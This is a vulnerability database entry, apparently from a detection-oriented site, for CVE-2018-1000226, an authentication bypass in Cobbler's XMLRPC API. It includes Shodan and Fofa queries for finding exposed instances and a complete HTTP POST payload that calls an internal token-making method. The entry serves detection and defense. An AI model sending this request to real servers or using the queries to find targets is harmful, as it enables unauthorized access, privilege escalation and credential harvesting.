🔙 목록으로 돌아가기

CVE-2018-1000226: Cobbler - Authentication Bypass

TitleCobbler - Authentication Bypass
Authorc-sh0
SeverityCritical
ImpactUnauthenticated attackers can bypass authentication to gain unauthorized access, leading to privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting.
RemediationApply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.
CVSS Score9.8
EPSS Score0.61011
CVE IDCVE-2018-1000226
CWE IDCWE-732
Shodan Queryhttp.title:"cobbler web interface"
Fofa Querytitle="cobbler web interface"
Tags cve2018 cve cobbler auth-bypass cobblerd vuln

🔍 Vulnerability Description

Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via “network connectivity”. Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.

🌐 HTTP Request

POST /cobbler_api HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Content-Length: 231
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version='1.0'?>

<methodCall>

  <methodName>_CobblerXMLRPCInterface__make_token</methodName>

  <params>

    <param>

      <value>

        <string>cobbler</string>

      </value>

    </param>

  </params>

</methodCall>

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-1000226.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-1000226.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A